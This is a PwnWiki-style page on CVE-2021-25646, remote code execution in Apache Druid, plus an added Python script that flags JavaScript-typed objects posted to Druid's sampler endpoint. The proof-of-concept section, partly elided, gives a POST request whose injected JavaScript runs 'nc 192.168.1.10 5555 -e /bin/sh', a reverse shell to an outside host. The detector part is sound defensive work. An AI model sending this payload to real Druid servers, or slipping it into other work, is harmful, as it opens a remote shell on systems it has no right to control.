CVE-2021-25646 Apache Druid JavaScript RCE Vulnerability

From PwnWiki
Revision as of 17:38, 18 March 2021 by Pwnwiki

POC

POST /druid/indexer/v1/sampler HTTP/1.1
...
...
 {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.1.10 5555 -e /bin/sh')}"
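
A defender-side check built from the two features visible in the request above (a POST to the sampler path and an object with `"type": "javascript"` carrying a `function`), as an added example that is not part of the original page. The sample bodies, the wrapper keys and the Java-reference heuristic are assumptions of this example.

```python
import json
import re

SAMPLER_PATH = "/druid/indexer/v1/sampler"   # endpoint from the PoC request line
# Heuristic (assumption of this example): Java class references in the function source.
JAVA_REF = re.compile(r"\bjavax?\.(?:[a-z]\w*\.)+[A-Z]\w*")
RAW_JS_TYPE = re.compile(r'"type"\s*:\s*"javascript"', re.IGNORECASE)

def find_javascript_nodes(node, path="$"):
    """Yield (json_path, function_source) for each object whose type is "javascript"."""
    if isinstance(node, dict):
        if str(node.get("type", "")).lower() == "javascript":
            yield path, str(node.get("function", ""))
        for key, value in node.items():
            yield from find_javascript_nodes(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_javascript_nodes(value, f"{path}[{index}]")

def inspect_request(method, uri, body):
    """Return findings for one logged request; an empty list means nothing was flagged."""
    if method.upper() != "POST" or uri.split("?", 1)[0].rstrip("/") != SAMPLER_PATH:
        return []
    try:
        document = json.loads(body)
    except (TypeError, ValueError):
        # Truncated or malformed body: fall back to a raw pattern match.
        hit = RAW_JS_TYPE.search(body or "")
        return [{"path": "<unparsed>", "severity": "medium"}] if hit else []
    findings = []
    for path, source in find_javascript_nodes(document):
        severity = "high" if JAVA_REF.search(source) else "medium"
        findings.append({"path": path, "severity": severity})
    return findings

# Constructed sample bodies. The wrapper keys "outer" and "items" are placeholders:
# the page elides the real nesting, so the detector does not depend on it.
SAMPLE_FLAGGED = json.dumps({"outer": {"items": [{
    "type": "javascript", "dimension": "added",
    "function": "function(value) { return java.lang.System.currentTimeMillis(); }"}]}})
SAMPLE_BENIGN = json.dumps({"type": "index", "spec": {"dataSchema": {"dataSource": "demo"}}})
SAMPLE_TRUNCATED = '{"type": "javascript", "function": "function(value) { return 1 }"'

if __name__ == "__main__":
    for name, body in [("flagged", SAMPLE_FLAGGED), ("benign", SAMPLE_BENIGN),
                       ("truncated", SAMPLE_TRUNCATED)]:
        print(name, inspect_request("POST", SAMPLER_PATH, body))
```

A "medium" finding means a JavaScript-typed object reached the sampler at all; "high" means its function source also names a Java class, as the PoC's does.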